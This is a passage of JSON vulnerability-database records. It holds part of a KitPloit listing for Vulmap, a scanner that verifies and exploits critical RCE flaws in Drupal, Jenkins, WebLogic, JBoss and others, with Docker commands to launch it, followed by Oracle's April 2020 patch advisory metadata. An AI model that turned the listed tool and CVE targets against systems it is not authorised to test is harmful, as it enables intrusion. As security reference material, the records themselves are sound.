7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | 
CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", 
"CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2022-10-24T19:58:58", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 399 new security patches across the product families listed below. 
Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2652714.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0254", "CVE-2015-1832", "CVE-2015-3253", "CVE-2015-7940", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-10244", "CVE-2016-10251", "CVE-2016-10328", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-3092", "CVE-2016-4000", "CVE-2016-4463", "CVE-2016-6306", "CVE-2016-6489", "CVE-2016-7103", "CVE-2016-8610", "CVE-2017-12626", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-14735", "CVE-2017-15706", "CVE-2017-3160", "CVE-2017-5130", "CVE-2017-5529", "CVE-2017-5533", "CVE-2017-5645", "CVE-2017-5754", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2018-0732", 
"CVE-2018-0734", "CVE-2018-0737", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000632", "CVE-2018-1000873", "CVE-2018-10237", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-1165", "CVE-2018-11775", "CVE-2018-11784", "CVE-2018-11797", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-1258", "CVE-2018-1304", "CVE-2018-1305", "CVE-2018-1320", "CVE-2018-1336", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-17197", "CVE-2018-18227", "CVE-2018-18311", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-19622", "CVE-2018-19623", "CVE-2018-19624", "CVE-2018-19625", "CVE-2018-19626", "CVE-2018-19627", "CVE-2018-19628", "CVE-2018-20346", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-20852", "CVE-2018-5407", "CVE-2018-5711", "CVE-2018-5712", "CVE-2018-6942", "CVE-2018-8014", "CVE-2018-8032", "CVE-2018-8034", "CVE-2018-8036", "CVE-2018-8037", "CVE-2018-8039", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-0199", "CVE-2019-0211", "CVE-2019-0215", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-0221", "CVE-2019-0222", "CVE-2019-0227", "CVE-2019-0228", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-10088", "CVE-2019-10092", "CVE-2019-10093", "CVE-2019-10094", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-1010238", "CVE-2019-10173", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12387", "CVE-2019-12402", "CVE-2019-12406", "CVE-2019-12415", "CVE-2019-12418", "CVE-2019-12419", "CVE-2019-12855", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", 
"CVE-2019-14821", "CVE-2019-14889", "CVE-2019-15161", "CVE-2019-15162", "CVE-2019-15163", "CVE-2019-15164", "CVE-2019-15165", "CVE-2019-1543", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-15601", "CVE-2019-15604", "CVE-2019-15605", "CVE-2019-15606", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16056", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17195", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-17563", "CVE-2019-17571", "CVE-2019-18197", "CVE-2019-19242", "CVE-2019-19244", "CVE-2019-19269", "CVE-2019-19317", "CVE-2019-19553", "CVE-2019-19603", "CVE-2019-19645", "CVE-2019-19646", "CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19924", "CVE-2019-19925", "CVE-2019-19926", "CVE-2019-19959", "CVE-2019-20218", "CVE-2019-20330", "CVE-2019-2412", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2756", "CVE-2019-2759", "CVE-2019-2852", "CVE-2019-2853", "CVE-2019-2878", "CVE-2019-2880", "CVE-2019-2899", "CVE-2019-2904", "CVE-2019-3008", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9517", "CVE-2019-9579", "CVE-2020-2514", "CVE-2020-2522", "CVE-2020-2524", "CVE-2020-2553", "CVE-2020-2558", "CVE-2020-2575", "CVE-2020-2578", "CVE-2020-2594", "CVE-2020-2680", "CVE-2020-2706", "CVE-2020-2733", "CVE-2020-2734", "CVE-2020-2735", "CVE-2020-2737", "CVE-2020-2738", "CVE-2020-2739", "CVE-2020-2740", "CVE-2020-2741", "CVE-2020-2742", "CVE-2020-2743", "CVE-2020-2744", "CVE-2020-2745", "CVE-2020-2746", "CVE-2020-2747", "CVE-2020-2748", "CVE-2020-2749", "CVE-2020-2750", "CVE-2020-2751", "CVE-2020-2752", "CVE-2020-2753", "CVE-2020-2754", "CVE-2020-2755", "CVE-2020-2756", "CVE-2020-2757", "CVE-2020-2758", "CVE-2020-2759", "CVE-2020-2760", "CVE-2020-2761", "CVE-2020-2762", "CVE-2020-2763", "CVE-2020-2764", "CVE-2020-2765", "CVE-2020-2766", "CVE-2020-2767", "CVE-2020-2768", "CVE-2020-2769", "CVE-2020-2770", "CVE-2020-2771", "CVE-2020-2772", 
"CVE-2020-2773", "CVE-2020-2774", "CVE-2020-2775", "CVE-2020-2776", "CVE-2020-2777", "CVE-2020-2778", "CVE-2020-2779", "CVE-2020-2780", "CVE-2020-2781", "CVE-2020-2782", "CVE-2020-2783", "CVE-2020-2784", "CVE-2020-2785", "CVE-2020-2786", "CVE-2020-2787", "CVE-2020-2789", "CVE-2020-2790", "CVE-2020-2791", "CVE-2020-2793", "CVE-2020-2794", "CVE-2020-2795", "CVE-2020-2796", "CVE-2020-2797", "CVE-2020-2798", "CVE-2020-2799", "CVE-2020-2800", "CVE-2020-2801", "CVE-2020-2802", "CVE-2020-2803", "CVE-2020-2804", "CVE-2020-2805", "CVE-2020-2806", "CVE-2020-2807", "CVE-2020-2808", "CVE-2020-2809", "CVE-2020-2810", "CVE-2020-2811", "CVE-2020-2812", "CVE-2020-2813", "CVE-2020-2814", "CVE-2020-2815", "CVE-2020-2816", "CVE-2020-2817", "CVE-2020-2818", "CVE-2020-2819", "CVE-2020-2820", "CVE-2020-2821", "CVE-2020-2822", "CVE-2020-2823", "CVE-2020-2824", "CVE-2020-2825", "CVE-2020-2826", "CVE-2020-2827", "CVE-2020-2828", "CVE-2020-2829", "CVE-2020-2830", "CVE-2020-2831", "CVE-2020-2832", "CVE-2020-2833", "CVE-2020-2834", "CVE-2020-2835", "CVE-2020-2836", "CVE-2020-2837", "CVE-2020-2838", "CVE-2020-2839", "CVE-2020-2840", "CVE-2020-2841", "CVE-2020-2842", "CVE-2020-2843", "CVE-2020-2844", "CVE-2020-2845", "CVE-2020-2846", "CVE-2020-2847", "CVE-2020-2848", "CVE-2020-2849", "CVE-2020-2850", "CVE-2020-2851", "CVE-2020-2852", "CVE-2020-2853", "CVE-2020-2854", "CVE-2020-2855", "CVE-2020-2856", "CVE-2020-2857", "CVE-2020-2858", "CVE-2020-2859", "CVE-2020-2860", "CVE-2020-2861", "CVE-2020-2862", "CVE-2020-2863", "CVE-2020-2864", "CVE-2020-2865", "CVE-2020-2866", "CVE-2020-2867", "CVE-2020-2868", "CVE-2020-2869", "CVE-2020-2870", "CVE-2020-2871", "CVE-2020-2872", "CVE-2020-2873", "CVE-2020-2874", "CVE-2020-2875", "CVE-2020-2876", "CVE-2020-2877", "CVE-2020-2878", "CVE-2020-2879", "CVE-2020-2880", "CVE-2020-2881", "CVE-2020-2882", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2885", "CVE-2020-2886", "CVE-2020-2887", "CVE-2020-2888", "CVE-2020-2889", "CVE-2020-2890", "CVE-2020-2891", 
"CVE-2020-2892", "CVE-2020-2893", "CVE-2020-2894", "CVE-2020-2895", "CVE-2020-2896", "CVE-2020-2897", "CVE-2020-2898", "CVE-2020-2899", "CVE-2020-2900", "CVE-2020-2901", "CVE-2020-2902", "CVE-2020-2903", "CVE-2020-2904", "CVE-2020-2905", "CVE-2020-2906", "CVE-2020-2907", "CVE-2020-2908", "CVE-2020-2909", "CVE-2020-2910", "CVE-2020-2911", "CVE-2020-2912", "CVE-2020-2913", "CVE-2020-2914", "CVE-2020-2915", "CVE-2020-2920", "CVE-2020-2921", "CVE-2020-2922", "CVE-2020-2923", "CVE-2020-2924", "CVE-2020-2925", "CVE-2020-2926", "CVE-2020-2927", "CVE-2020-2928", "CVE-2020-2929", "CVE-2020-2930", "CVE-2020-2931", "CVE-2020-2932", "CVE-2020-2933", "CVE-2020-2934", "CVE-2020-2935", "CVE-2020-2936", "CVE-2020-2937", "CVE-2020-2938", "CVE-2020-2939", "CVE-2020-2940", "CVE-2020-2941", "CVE-2020-2942", "CVE-2020-2943", "CVE-2020-2944", "CVE-2020-2945", "CVE-2020-2946", "CVE-2020-2947", "CVE-2020-2949", "CVE-2020-2950", "CVE-2020-2951", "CVE-2020-2952", "CVE-2020-2953", "CVE-2020-2954", "CVE-2020-2955", "CVE-2020-2956", "CVE-2020-2958", "CVE-2020-2959", "CVE-2020-2961", "CVE-2020-2963", "CVE-2020-2964", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-7044", "CVE-2020-8840"], "modified": "2020-07-20T00:00:00", "id": "ORACLE:CPUAPR2020", "href": "https://www.oracle.com/security-alerts/cpuapr2020.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}